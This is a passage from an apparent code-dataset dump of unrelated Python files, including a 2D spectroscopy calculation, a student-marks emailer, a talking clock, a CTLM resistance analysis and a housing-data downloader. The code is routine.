self.t1axis.locate(tt2) \n self._vprint(\"t2 = \"+str(tt2)+\"fs (it2 = \"+str(it2)+\")\")\n \n #\n # calcute response\n #\n self._vprint(\"calculating response: \")\n rmin = 0.0001\n t1 = time.time()\n \n self._vprint(\" - ground state bleach\")\n # GSB\n nr3td.nr3_r3g(lab, sys, it2, t1s, t3s, rwa, rmin, resp_r) \n nr3td.nr3_r4g(lab, sys, it2, t1s, t3s, rwa, rmin, resp_n)\n \n self._vprint(\" - stimulated emission\")\n # SE\n nr3td.nr3_r1g(lab, sys, it2, t1s, t3s, rwa, rmin, resp_n)\n nr3td.nr3_r2g(lab, sys, it2, t1s, t3s, rwa, rmin, resp_r)\n \n self._vprint(\" - excited state absorption\")\n # ESA\n nr3td.nr3_r1fs(lab, sys, it2, t1s, t3s, rwa, rmin, resp_r)\n nr3td.nr3_r2fs(lab, sys, it2, t1s, t3s, rwa, rmin, resp_n)\n \n # Transfer\n sys.set_population_propagation_matrix(Uee[:,:,tc]-Uc0[:,:,tc])\n \n self._vprint(\" - stimulated emission with transfer\") \n # SE\n nr3td.nr3_r1g_trans(lab, sys, it2, t1s, t3s, rwa, rmin, resp_n)\n nr3td.nr3_r2g_trans(lab, sys, it2, t1s, t3s, rwa, rmin, resp_r)\n \n self._vprint(\" - excited state absorption with transfer\") \n # ESA\n nr3td.nr3_r1fs_trans(lab, sys, it2, t1s, t3s, rwa, rmin, resp_r)\n nr3td.nr3_r2fs_trans(lab, sys, it2, t1s, t3s, rwa, rmin, resp_n)\n \n \n t2 = time.time()\n self._vprint(\"... 
calculated in \"+str(t2-t1)+\" sec\")\n \n \n #\n # Calculate corresponding 2D spectrum\n #\n \n ftresp = numpy.fft.fft(resp_r,axis=1)\n ftresp = numpy.fft.ifft(ftresp,axis=0)\n reph2D = numpy.fft.fftshift(ftresp)\n \n ftresp = numpy.fft.ifft(resp_n,axis=1)\n ftresp = numpy.fft.ifft(ftresp,axis=0)*ftresp.shape[1]\n nonr2D = numpy.fft.fftshift(ftresp)\n \n \n onetwod = TwoDSpectrumContainer()\n onetwod.set_axis_1(oa1)\n onetwod.set_axis_3(oa3)\n onetwod.set_data(reph2D, dtype=\"Reph\")\n onetwod.set_data(nonr2D, dtype=\"Nonr\")\n \n twods.append(onetwod)\n tc += 1 \n \n return twods\n \n else:\n \n # fall back on quantarhei's own implementation\n \n ret = TwoDSpectrumContainer()\n \n \n return ret\n \n \n \n \n ","sub_path":"quantarhei/spectroscopy/twod2.py","file_name":"twod2.py","file_ext":"py","file_size_in_byte":13741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"119548909","text":"#!/usr/local/bin/python2.7\n# encoding: utf-8\n\n'''\nCircle, outline only : GL_LINE_STRIP\nvertices are ordered clockwise : 12, 1, 2, 3, 4, 5...\nnumber of vertices per half-circle for a smooth result is : radius/5 +3\n'''\n\n#--- IMPORTS ------------------------------------------------------------------\nfrom math import pi, sin, cos\nfrom bw import *\n\n##--- CONSTANTS AND VARIABLES -------------------------------------------------\nradius=100\nstepangle = pi/(int(radius/5)+3)\nphi=0\nverts=[]\n\n#--- VERTEX GENERATION --------------------------------------------------------\nverts.append((0, radius))\nwhile phi NoneType\n\n Send an email to recipient with subject line subject and message\n body message_body.\n\n '''\n\n # Build the message header\n header = ('From: %s\\nTo: %s\\nSubject: %s\\r\\n\\r\\n' %\n (sender, recipient, subject))\n\n # Actually send the message\n with os.popen('%s -t' % (sendmail_loc), 'w') as email:\n email.write(header + message_body)\n\n\ndef send_mails(students, subject, path_pref, path_suff):\n '''({str: Student}, str, str, str) -> NoneType\n\n Send an email to each student in the dictionary of Students (by\n student_id), with subject subject and the message body being the\n contents of a file path_pref/Student.utorid/path_suff.\n\n '''\n\n for student in students.values():\n try:\n with open(os.path.join(path_pref,\n student.student_id,\n path_suff)) as markfile:\n body = markfile.read()\n except IOError as error:\n print('No result for %s: %s' % (student.student_id, error))\n continue\n\n send_mail(student.email, subject, body)\n\n\nif __name__ == '__main__':\n\n # get args\n PARSER = argparse.ArgumentParser(\n description=('Email contents of result files to students.\\n'))\n PARSER.add_argument('-s', '--subject', help='The subject line.')\n PARSER.add_argument(\n '-c', '--classlist',\n help='Path to the classlist file in BlackBoard format.')\n PARSER.add_argument(\n '-p', '--path_prefix',\n help=('Prefix of the path to the file to email: ' +\n 'up to student submission directory.'))\n PARSER.add_argument(\n '-x', '--path_suffix',\n help=('Suffix of the path to the file to email: ' +\n 'from the student submission directory.'))\n ARGS = PARSER.parse_args()\n\n # email\n with open(ARGS.classlist) as clslist:\n send_mails(load_bb(clslist),\n ARGS.subject,\n ARGS.path_prefix if ARGS.path_prefix else '',\n ARGS.path_suffix if ARGS.path_suffix else '')
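\n# hypothetical invocation, for illustration only ('-x' is an assumed short flag replacing the duplicate '-s' in the parser above):\n#   python3 emailmarks.py -s 'A1 marks' -c classlist.csv -p submissions -x feedback.txt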
\n","sub_path":"utils/emailmarks.py","file_name":"emailmarks.py","file_ext":"py","file_size_in_byte":2476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"71045450","text":"\"\"\"\nGiven a series as shown below:\n\n 1 2\n 3 4 5 6\n 7 8 9 10 11 12\n 13 14 15 16 17 18 19 20\n ..........................\n ............................\n (so on)\n\nYou are given a number N, you need to write a program to find the sum of all elements in the N-th row of above series.\n\nInput:\nFirst line of input contains a single integer T which denotes the number of test cases. First line of each test case contains a single integer N.\n\nOutput:\nFor each test case, print the sum of all the elements present in Nth row of above series.\n\nConstraints:\n1<=T<=100\n1<=N<=100\n\nExample:\nInput:\n2\n2\n4\nOutput:\n18\n132\n\"\"\"\n\n\ndef sum_terms_nth_row(n):\n count = 0\n a = n * (n - 1) + 1\n b = n * (n + 1)\n for x in range(a, b + 1):\n count += x\n return count\n\n\nif __name__ == '__main__':\n t = int(input())\n for i in range(t):\n n = int(input())\n print(sum_terms_nth_row(n))\n","sub_path":"practice/Basic/sum_terms_nth_row.py","file_name":"sum_terms_nth_row.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"529721703","text":"\"\"\"ROSARIO VALERO MIRANDA - 1º DAW - PRACTICA5 - EJERCICIO 8\r\nWrite a program that first asks for a number and then keeps asking for numbers\r\nuntil the sum of the numbers entered matches the initial number.\r\nThe program finishes by printing the list of numbers.\"\"\"\r\n\r\nprint(\"Introduce el número limite\")\r\nnum=int(input())\r\n\r\nprint(\"Introduce un valor\")\r\nnum1=int(input())\r\n\r\n\r\nlista=[]\r\n\r\nwhile num1>num:\r\n print(num1,\"es más grande.Introduce otro valor\")\r\n num1=int(input())\r\nnum=num-num1\r\nlista.append(num1)\r\n\r\nwhile num>0:\r\n print(\"Introduce otro valor\")\r\n num1=int(input())\r\n \r\n while num1>num:\r\n print(num1,\"es demasiado grande.Introduce otro valor\")\r\n num1=int(input())\r\n num=num-num1\r\n lista.append(num1)\r\n\r\nprint(\"El limite a superar es\", num, \".La lista creada és\", lista)\r\n","sub_path":"Ejercicios-Pr5/ejercicio8.py","file_name":"ejercicio8.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"337955461","text":"#!/usr/bin/env python3\n\n# Sam Kim\n# \n# This is my solution to Talking Clock, implemented with the bonus verbal part.\n# The program will continually prompt the user to input any time (24H format)\n# and the given time will be read aloud and displayed on the console as output.\n# The user can also press 'Enter' to get the current time.\n#\n# Requires:\n# - Python 3\n# - PyAudio module (https://people.csail.mit.edu/hubert/pyaudio/)\n# - /sounds/ in same directory as this file\n\nimport pyaudio\nimport wave\nimport datetime\n\n# Global variable to play special sound in def play_audio(...)\nCURRENT_TIME = False\n\ndef get_hour_str(hour_int):\n hours = {\"0\":\"twelve\",\n \"1\":\"one\",\n \"2\":\"two\",\n \"3\":\"three\",\n \"4\":\"four\",\n \"5\":\"five\",\n \"6\":\"six\",\n \"7\":\"seven\",\n \"8\":\"eight\",\n \"9\":\"nine\",\n \"10\":\"ten\",\n \"11\":\"eleven\"}\n\n return hours[str(hour_int % 12)] + \" \"\n\ndef get_min_str(min_int):\n\n min_tens = {\"0\":\"\",\n \"1\":\"ten\",\n \"2\":\"twenty\",\n \"3\":\"thirty\",\n \"4\":\"forty\",\n 
\"5\":\"fifty\"}\n\n min_ones = {\"0\":\"\",\n \"1\":\"one\",\n \"2\":\"two\",\n \"3\":\"three\",\n \"4\":\"four\",\n \"5\":\"five\",\n \"6\":\"six\",\n \"7\":\"seven\",\n \"8\":\"eight\",\n \"9\":\"nine\"}\n\n min_teens = {\"10\":\"ten\",\n \"11\":\"eleven\",\n \"12\":\"twelve\",\n \"13\":\"thirteen\",\n \"14\":\"fourteen\",\n \"15\":\"fifteen\",\n \"16\":\"sixteen\",\n \"17\":\"seventeen\",\n \"18\":\"eighteen\",\n \"19\":\"nineteen\"}\n\n min_ten_int = min_int // 10\n min_ones_int = min_int % 10\n\n result = \"\"\n\n if (min_int == 0):\n return \"\"\n elif (min_int < 10):\n result = \"oh \" + min_ones[str(min_ones_int)]\n elif (min_int < 20):\n result = min_teens[str(min_int)]\n else:\n if (min_ones_int % 10 == 0):\n result = min_tens[str(min_ten_int)]\n else:\n result = min_tens[str(min_ten_int)] + \" \" + min_ones[str(min_ones_int)] \n\n return result + \" \"\n\ndef get_ampm_str(hour_int):\n return \"AM\" if (hour_int < 12) else \"PM\"\n\n# Given a valid time, prints a string of how the time would be read in English\ndef solution(time_str):\n\n hour_int = int(time_str[:time_str.index(':')])\n min_int = int(time_str[time_str.index(':') + 1:])\n \n play_audio(str(hour_int % 12), str(min_int), get_ampm_str(hour_int).lower())\n global CURRENT_TIME\n\n if CURRENT_TIME:\n start_str = \"It's currently \"\n CURRENT_TIME = False\n else:\n start_str = \"It's \"\n\n print((start_str + get_hour_str(hour_int) +\n get_min_str(min_int) + get_ampm_str(hour_int) + \"\\n\"))\n\n# For testing and main(), returns a list of all possible 24H times\ndef get_all_times():\n tests = []\n\n for i in range(24):\n for minute in range(60):\n hour = (\"0\" + str(i)) if (i < 10) else str(i)\n minute = (\"0\" + str(minute)) if (minute < 10) else str(minute)\n test = hour + \":\" + minute\n tests.append(test)\n\n return tests\n\n# Taken from PyAudio Docs (https://people.csail.mit.edu/hubert/pyaudio/docs/)\n# Plays a .wav file\ndef play_wf(path):\n CHUNK = 1024\n\n wf = wave.open(path, 'rb')\n\n # instantiate PyAudio (1)\n p = pyaudio.PyAudio()\n\n # open stream (2)\n stream = p.open(format=p.get_format_from_width(wf.getsampwidth()),\n channels=wf.getnchannels(),\n rate=wf.getframerate(),\n output=True)\n\n # read data\n data = wf.readframes(CHUNK)\n\n # play stream (3)\n while len(data) > 0:\n stream.write(data)\n data = wf.readframes(CHUNK)\n\n # stop stream (4)\n stream.stop_stream()\n stream.close()\n\n # close PyAudio (5)\n p.terminate()\n\n# Plays the necessary audio given hour, minute, and am/pm strings\ndef play_audio(hour, min, ampm):\n # Special horn for current time\n if CURRENT_TIME:\n play_wf(\"./sounds/announcement.wav\")\n\n # \"It's\"\n play_wf(\"./sounds/its.wav\")\n\n # hour\n if hour in [\"0\", \"12\"]: hour = \"12\"\n play_wf(\"./sounds/%s.wav\" % hour)\n\n # minute\n if min == \"0\":\n min = \"00\"\n elif int(min) < 10:\n play_wf(\"./sounds/o.wav\")\n play_wf(\"./sounds/%s.wav\" % min)\n\n # \"AM\" or \"PM\"\n play_wf(\"./sounds/%s.wav\" % ampm)\n\n# Loop until user wants to quit\ndef main():\n global CURRENT_TIME\n proper_times = get_all_times()\n print (\"Hi, welcome to my solution to Talking Clock...\\n\")\n\n while (True):\n time = input( (\"Input any valid time formatted like '00:00'.\\n\" + \n \"Press Enter for the current time.\\n\" + \n \"Enter 'q' to quit...\\n> \") ).strip()\n if (time.lower() == \"q\"):\n return\n elif (time == \"\"):\n now = datetime.datetime.now()\n time = str(now.hour) + \":\" + str(now.minute)\n CURRENT_TIME = True\n elif (time not in proper_times):\n print (\"Oops! 
Try again...\")\n continue\n\n solution(time)\n\nif __name__ == \"__main__\":\n main()","sub_path":"Challenge #321 [Easy] Talking Clock/talking_clock.py","file_name":"talking_clock.py","file_ext":"py","file_size_in_byte":5314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"326877701","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n\"\"\"\nBIOL7800 Assignment 5 Task 1\n\nAmie Settlecowski\n2 Feb. 2016\n\n\"\"\"\n\n\ndef cheer():\n\n count = [str(n) for n in range(2, 9, 2)]\n phrase = 'Who do we appreciate?'\n count_str = str((','.join(count)))\n print(count_str, ':', phrase)\n\ncheer()\n","sub_path":"answers/amiesett/task1_settlecowski.py","file_name":"task1_settlecowski.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"52256136","text":"import os \r\n\r\n\r\nos.environ['CUDA_DEVICE_ORDER'] = 'PCI_BUS_ID'\r\nos.environ['CUDA_VISIBLE_DEVICES'] = \"0\"\r\n\r\n\r\nimport tensorflow as tf \r\nimport numpy as np \r\n\r\nfrom np_anchors import create_target_assigner, batch_assign_targets, Anchor\r\nfrom object_detection import np_box_list as box_list\r\nfrom retinanet import retinanet\r\n\r\n\r\n# format: ymin,xmin, ymax, xmax\r\ntest_gt_boxes_list= [[\r\n [0.1, 0.1, 0.2,0.2],\r\n [0.3,0.3, 0.7,0.7],\r\n [0.8,0.8,0.9,0.9]\r\n] ]\r\n\r\ntest_gt_labels_list= [ [\r\n 1,2\r\n] ]\r\n\r\ntest_gt_boxes_list = np.array(test_gt_boxes_list,dtype=np.float32)\r\ntest_gt_labels_list = np.array(test_gt_labels_list, dtype=np.int32)\r\n# need to prepare this as one-hot vector format...\r\n\r\ndef create_one_hot_vector_gt_labels(gt_labels_index_list, vector_length):\r\n \"\"\"\r\n gt_labels_index_list: [batch,num_gt_labels] shaped np array with dtype int.\r\n \"\"\"\r\n batch_size = gt_labels_index_list.shape[0]\r\n gt_label_num = gt_labels_index_list.shape[1]\r\n empty_array = np.zeros((batch_size,gt_label_num, vector_length), dtype=np.float32)\r\n # empty_array[np.arange(gt_label_num), gt_labels_index_list] = 1\r\n \r\n # print(\"batch size:{}\".format(batch_size))\r\n batch_list=[]\r\n\r\n for batch_index in range(batch_size):\r\n single_gt_labels_index_list = gt_labels_index_list[batch_index]\r\n empty_array[batch_index,np.arange(gt_label_num), single_gt_labels_index_list] = 1.\r\n\r\n print(\"finished empty_array:{}\".format(empty_array))\r\n return empty_array\r\n\r\n\r\n\r\n\r\ndef _get_feature_map_shape(feature_map_list):\r\n output=[]\r\n for feature_map in feature_map_list:\r\n print(feature_map)\r\n shape = feature_map.get_shape().as_list()\r\n print(shape)\r\n output.append( (shape[1], shape[2]) )\r\n\r\n return output\r\n\r\ndef _assign_targets(gt_boxes_list, gt_labels_list, target_assigner, anchors):\r\n \"\"\"\r\n Assign gt targets\r\n Args:\r\n gt_boxes_list: a list of 2-D tensor of shape [num_boxes, 4] containing coordinates of gt boxes\r\n gt_labels_list: a list of 2-D one-hot tensors of shape [num_boxes, num_classes] containing gt classes\r\n Returns:\r\n batch_cls_targets: class tensor with shape [batch_size, num_anchors, num_classes]\r\n batch_reg_target: box tensor with shape [batch_size, num_anchors, 4]\r\n match_list: a list of matcher.Match object encoding the match between anchors and gt boxes for each image\r\n of the batch, with rows corresponding to gt-box and columns corresponding to anchors\r\n \"\"\"\r\n gt_boxlist_list = [box_list.BoxList(boxes) for boxes in gt_boxes_list]\r\n # gt_labels_with_bg = [tf.pad(gt_class, [[0, 
0], [1, 0]], mode='CONSTANT')\r\n # for gt_class in gt_labels_list]\r\n anchors_boxlist = box_list.BoxList(anchors)\r\n print(\"inside _assign_targets, anchors_boxlist data={}\".format(anchors_boxlist.get()) )\r\n return batch_assign_targets(target_assigner,anchors_boxlist,gt_boxlist_list,gt_labels_list)\r\n\r\n\r\nimage_shape=(224,224)\r\n\r\nnum_classes=2\r\nnum_scales = 2\r\naspect_ratios = (1.0, 2.0, 0.5)\r\nanchor_scale = 4.0\r\n\r\ntest_gt_labels_list = create_one_hot_vector_gt_labels(test_gt_labels_list, num_classes+1)\r\n\r\n\r\nnum_anchors_per_loc = num_scales * len(aspect_ratios)\r\n\r\ninputs = tf.placeholder(tf.float32, shape=(1,224,224,3))\r\n\r\nprediction_dict = retinanet(inputs, num_classes, num_anchors_per_loc, is_training=True)\r\n\r\n\r\n\r\nfeature_map_shape_list = _get_feature_map_shape(prediction_dict[\"feature_map_list\"])\r\nanchor_generator = Anchor(feature_map_shape_list=feature_map_shape_list,\r\n img_size=image_shape,\r\n anchor_scale=anchor_scale,\r\n aspect_ratios=aspect_ratios,\r\n scales_per_octave=num_scales)\r\n\r\nanchors = anchor_generator.boxes\r\n\r\nprint(\"anchors shape:{}\".format(anchors.shape))\r\n\r\n# unmatched_class_label = tf.constant((num_classes + 1) * [0], tf.float32)\r\nunmatched_class_label = np.array((num_classes + 1) * [0], dtype=np.float32)\r\ntarget_assigner = create_target_assigner(unmatched_cls_target=unmatched_class_label)\r\n\r\n\r\n\r\n_assign_targets(test_gt_boxes_list, test_gt_labels_list, target_assigner, anchors)","sub_path":"create_anchor.py","file_name":"create_anchor.py","file_ext":"py","file_size_in_byte":4294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"513559873","text":"import os, csv, fnmatch\nimport time\nimport sys\nimport re\n#==============================================================================\ndef getFileTypes(fileName):\n if '.png' in fileName or '.jpg' in fileName:\n fileType = 'Image'\n elif '.csv' in fileName:\n fileType = 'CSV'\n elif '.xls' in fileName or '.xlsx' in fileName:\n fileType = 'Excel'\n elif '.txt' in fileName:\n fileType = 'Text'\n else:\n fileType = 'Unidentified'\n return fileType\n\ndef getFullFilePath(imFileList, dirName):\n fullFilePath = []\n for fileName in fnmatch.filter(imFileList, '*.*'):\n fullFilePath.append(os.path.join(dirName, fileName))\n return fullFilePath\n \ndef getCouponName(fileName):\n regex = re.compile(\"[0-9]{0,}[\\\\-_][0-9]{0,}[\\\\-_][0-9]{0,}\")\n matchArray = regex.findall(fileName)\n if(matchArray):\n return matchArray[0].replace('_', '-')\n else:\n return ''\n \ndef getImageAttributes(fileName):\n if '.png' in fileName or '.jpg' in fileName:\n name = fileName.split('.')[0]\n nameTypes = name.split('-')\n series = nameTypes[0]\n panel = nameTypes[1]\n coupon = nameTypes[2]\n attributes = [series, panel, coupon]\n return attributes\n else:\n return []\n \ndef getSeries(dirName):\n if 'DOE_I/' in dirName or 'DOE_I_' in dirName:\n return 'Series 2'\n elif 'DOE_II/' in dirName or 'DOE_II_' in dirName:\n return 'Series 6'\n elif 'DOE_IV/' in dirName or 'DOE_IV_' in dirName:\n return 'Series 10'\n#==============================================================================\n\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 2:\n print(\"Error in arguments passed.\\nStandard input format:\")\n print(\"$python3 pathTraversal.py <pathToRootDirectory>\")\n sys.exit()\n datetime = time.strftime(\"%Y%m%d_%H%M%S\")\n nameOfCSV = 'graphFilePath_run_'+datetime+'.csv'\n nameOfDirectoryCsv = 'graphDirectory_run_'+datetime+'.csv'\n 
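# sys.argv[1] (checked above) is the root of the directory tree that os.walk traverses below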
rootDirectory= sys.argv[1]\n headerSetFlag = False\n cleanedList = []\n couponList = list()\n dirList = list()\n #==============================================================================\n #creating the header row\n \n headerRow = [\"FullFilePath\",\"FileTypes\", \"CurrentDirectoryName\",\"SeriesName\",\\\n \"AllFileList\", \"CouponName\", \"Series\",\"Panel\", \"Coupon\"]\n \n #============================================================================== \n \n \n #creating the CSV file=========================================================\n with open(nameOfCSV, 'a',newline='') as csvFile:\n w = csv.writer(csvFile)\n w.writerow(headerRow)\n headerforDir = ['currentDirectory','currLabel', 'parentDirectory','PLabel', 'childDirectory', 'CLabel', \\\n 'NumOfFilesInside', 'NumofSubDir', 'SubDirLabels', 'FilePathsInsideCurr']\n with open(nameOfDirectoryCsv, 'a',newline='') as csvFileD:\n ww = csv.writer(csvFileD)\n ww.writerow(headerforDir)#write the header row\n for dirName, subDirList, imFileList in os.walk(rootDirectory):\n depth = len(dirName.rstrip(os.path.sep).split(os.path.sep))#find the depth of the curr dir\n currLabel = dirName.rstrip(os.path.sep).split(os.path.sep)[-1]#current directory label \n fullFilePath = getFullFilePath(imFileList, dirName) #get full path names for files.\n if depth >1:\n isOfSubDir = (os.path.sep).join((dirName.rstrip(os.path.sep).split(os.path.sep)[:-1])) #the parent directory\n Plabel = (dirName.rstrip(os.path.sep).split(os.path.sep)[-2])#parent directory label\n else:\n isOfSubDir = ''\n Plabel =''\n dirList = [dirName.strip().replace(' ','_'), currLabel.strip().replace(' ','_'),\\\n isOfSubDir.strip().replace(' ','_') ,Plabel.strip().replace(' ','_'),'','',\\\n len(imFileList),len(subDirList),','.join(subDirList).strip().replace(' ','_'),\\\n ','.join(fullFilePath).strip().replace(' ','_')]\n try:\n ww.writerow(dirList)#write the header of each level \n except:\n pass\n \n #for the stuff inside the subdirectories\n for bfsDir in subDirList:\n depth = len(dirName.rstrip(os.path.sep).split(os.path.sep))\n currLabel = dirName.rstrip(os.path.sep).split(os.path.sep)[-1]#current directory label\n filePathForSD = getFullFilePath(imFileList, dirName) #get full path names for files.\n if depth >1:\n isOfSubDir = (os.path.sep).join((dirName.rstrip(os.path.sep).split(os.path.sep)[:-1])) #the parent directory\n Plabel = (dirName.rstrip(os.path.sep).split(os.path.sep)[-2])\n else:\n isOfSubDir = ''\n Plabel = ''\n\n Clabel = bfsDir.split(os.path.sep)[-1]\n dirList = [dirName.strip().replace(' ','_') , currLabel.strip().replace(' ','_'),\\\n isOfSubDir.strip().replace(' ','_'), Plabel.strip().replace(' ','_') ,\\\n os.path.join(dirName, bfsDir).strip().replace(' ','_') ,Clabel.strip().replace(' ','_'),\\\n len(imFileList), '','',','.join(filePathForSD).strip().replace(' ' ,'_')]\n try:\n ww.writerow(dirList)\n except:\n pass\n \n #for individual files\n for fileName in fnmatch.filter(imFileList, '*.*'):\n filePath = os.path.join(dirName, fileName).strip().replace(' ','_')\n currentDirName = dirName.rstrip(os.path.sep).split(os.path.sep)[-1].strip().replace(' ','_')\n couponName = getCouponName(fileName)\n splitcoupon = couponName.split('-') if len(couponName) != 0 else ['','','']\n cleanedList = [filePath.strip().replace('\\\\','/'), getFileTypes(fileName), dirName.strip().replace('\\\\','/'),\\\n getSeries(dirName),fileName.strip().replace(' ','_'), couponName, str(splitcoupon[0]),\\\n str(splitcoupon[1]), str(splitcoupon[2])]\n if(len(couponName)>0): \n 
splitcoupon.insert(0,couponName)\n if (len(cleanedList) != 0):\n try: \n w.writerow(cleanedList)\n except:\n pass\n \n #closing the CSV file=========================================================\n csvFile.close()\n csvFileD.close()\nprint(\"Conversion done.\\nFilenames are --> \")\nprint(\"1. For Directory Structure - {} \\n2. For FileStructure Associated with domain knowledge - {}\".format(nameOfDirectoryCsv,nameOfCSV))\n\n\n","sub_path":"darpa-CSSubteaam/pathTraversal/pathTraversal.py","file_name":"pathTraversal.py","file_ext":"py","file_size_in_byte":7184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"364167089","text":"import csv\nimport numpy as np\n\namps = 300\nnormalise = 1\n\ngap = 50\ndata = []\ndataArray = []\n\nr2 = 200\nr1 = r2-gap\n\ncorrFactor = (r1/gap)*(np.log((r1+gap)/r1))\nprint(corrFactor, r1+gap)\n\na, b = \"\", \"\"\n\n\n# print(\"gap = \", gap)\nwith open(\"./CTLM/{}.txt\".format(gap)) as file:\n data = np.asarray(file.readlines())\n\ndata = np.asarray(data[1:])\n# print(data)\n# print('len= ', len(data))\nresistance = np.zeros(0)\nfor j in range(len(data)):\n # print(\"j = \", j)\n dataArray.append(data[j].split('\\t'))\n # print(\"here\")\n # print(dataArray[j])\n if float(dataArray[j][0]) != 0:\n resistance = np.append(resistance, (float(dataArray[j][1])/(0.001*float(dataArray[j][0]))))\n # print(float(dataArray[j][1]), float(dataArray[j][0]), resistance)\n dataArray[j][1] = dataArray[j][1][:-1]\n a = \"({},{})\\n\".format(dataArray[j][0], dataArray[j][1])\n b += a\n\n# print(resistance)\nfinalResistance = np.median(resistance)\n# print(finalResistance)\n\ncounter = 0\nfor i in range(len(resistance)):\n if resistance[i] > 1.1*finalResistance or resistance[i] < 0.9*finalResistance:\n resistance[i] = 0\n counter += 1\n# print(\"counter =\", counter)\n# print(np.max(resistance))\nfinalResistance = np.average(resistance)\n# print(finalResistance)\nfinalResistance = np.average(resistance)*(len(resistance)/(len(resistance)-counter))\ncorrResistance = finalResistance/corrFactor\n# print((len(resistance)/(len(resistance)-counter)))\n# print(finalResistance)\n\n\n\n# squaredError = np.square(finalResistance-resistance)\n# # print(squaredError)\n# meanSquared = 0\n# for i in range(len(resistance)):\n# meanSquared += squaredError[i]\n\n# # print(meanSquared, np.max(squaredError))\n# meanSquared = (np.sum(squaredError))/len(squaredError)\n# # print(meanSquared)\n\n# counter = 0\n# for i in range(len(squaredError)):\n# if squaredError[i] > 0.1*meanSquared:\n# squaredError[i] = 0\n# counter += 1\n \n# # print(\"counter ={}\".format(counter))\n# meanSquared = (np.sum(squaredError))/(len(squaredError)-counter)\n\n# print('here')\n# print(len(squaredError))\n# print(meanSquared)\n\nb = \"({},{})\\n\".format(gap, corrResistance)\nfile1 = open(\"./angus_bruce/processed/CTLM_res_corr_output.txt\".format(gap),mode=\"a\")#append mode \nfile1.write(b) \nfile1.close()\n \n # data0, data1 = np.hsplit(data[i],)\n\n\n# with open('./angus_bruce/spectrum_{}mA.csv'.format(amps), newline='') as csvfile:\n# data = list(csv.reader(csvfile))\n\n# if data:\n# numberRows = len(data)\n\n# semiFinder = [-1] * numberRows\n# counter = 0\n\n# for i in range(numberRows):\n# semiFinder[i] = data[i][0].find(';')\n# if semiFinder[i] == 16:\n# counter += 1\n\n# a = []\n# b = []\n\n# for i in range(numberRows):\n# if semiFinder[i] == 16:\n# try:\n# # a = \"({},{})\\n\".format(float(data[i][0].split(\";\")[0]), float(data[i][0].split(\";\")[1]))\n# a 
= [float(data[i][0].split(\";\")[0]), float(data[i][0].split(\";\")[1])]\n# b.append(a)\n# except ValueError:\n# print(\"On line {}, not a number, skipping...\".format(i))\n\n# b = np.asarray(b)\n\n# if normalise == 1:\n# print(\"Normalising\")\n# b0, b1 = np.hsplit(b, 2)\n# print(b0)\n# print(b1)\n# b1 /= np.max(b1)\n# b = np.column_stack((b0, b1))\n# print(\"Normalised\")\n# print(b)\n\n# output = \"\"\n\n# print(np.shape(b))\n# print(len(b))\n\n# for i in range(len(b)):\n# a = \"({},{})\\n\".format(b[i][0], b[i][1])\n# output += a\n\n# file1 = open(\"./angus_bruce/processed/spectrum_{}mA_output.txt\".format(amps),\"w\")#write mode \n# file1.write(output) \n# file1.close()","sub_path":"Figures/ctlm_convert_to_latex_correction.py","file_name":"ctlm_convert_to_latex_correction.py","file_ext":"py","file_size_in_byte":3583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"845362","text":"import os\nimport tarfile\nfrom six.moves import urllib\nimport pandas as pd\n\ndownload_root = \"https://raw.githubusercontent.com/ageron/handson-ml/master/\"\nHOUSING_PATH = \"../data_deal/datasets/housing\"\nHOUSING_URL = download_root + \"datasets/housing/housing.tgz\"\n\n\ndef fetch_housing_data(housing_url=HOUSING_URL, housing_path=HOUSING_PATH):\n if not os.path.isdir(housing_path):\n os.makedirs(housing_path)\n tgz_path = os.path.join(housing_path,'housing.tgz')\n urllib.request.urlretrieve(housing_url,tgz_path)\n housing_tgz = tarfile.open(tgz_path)\n housing_tgz.extractall(path=housing_path)\n housing_tgz.close()\n\n\n# fetch_housing_data()\n\ndef load_housing_data(housing_path = HOUSING_PATH):\n csv_path = os.path.join(housing_path,\"housing.csv\")\n return pd.read_csv(csv_path)\n\n# housing_data = load_housing_data()\n# print(housing_data.info())\n\n# print(housing_data[\"ocean_proximity\"].value_counts())\n'''\n<1H OCEAN 9136\nINLAND 6551\nNEAR OCEAN 2658\nNEAR BAY 2290\nISLAND 5\nName: ocean_proximity, dtype: int64\n'''\n\n\n'''\nFetch the dataset\n\n<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 20640 entries, 0 to 20639\nData columns (total 10 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 longitude 20640 non-null float64\n 1 latitude 20640 non-null float64\n 2 housing_median_age 20640 non-null float64\n 3 total_rooms 20640 non-null float64\n 4 total_bedrooms 20433 non-null float64\n 5 population 20640 non-null float64\n 6 households 20640 non-null float64\n 7 median_income 20640 non-null float64\n 8 median_house_value 20640 non-null float64\n 9 ocean_proximity 20640 non-null object \ndtypes: float64(9), object(1)\nmemory usage: 1.6+ MB\n\n'''\n","sub_path":"data_deal/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"226592583","text":"#!/usr/bin/python\nfrom math import sqrt, exp\n\ndef fkt(x,r):\n n = len(x)\n out1 = 0\n out2 = 0\n c = 100\n damp = n**2\n rij = [0]*5\n\n for i in xrange(0, n, 2):\n for j in xrange(i + 2, n, 2):\n dist = (x[i] - x[j]) ** 2 + (x[i + 1] - x[j + 1]) ** 2\n out1 = out1 + sqrt(dist)\n rij = 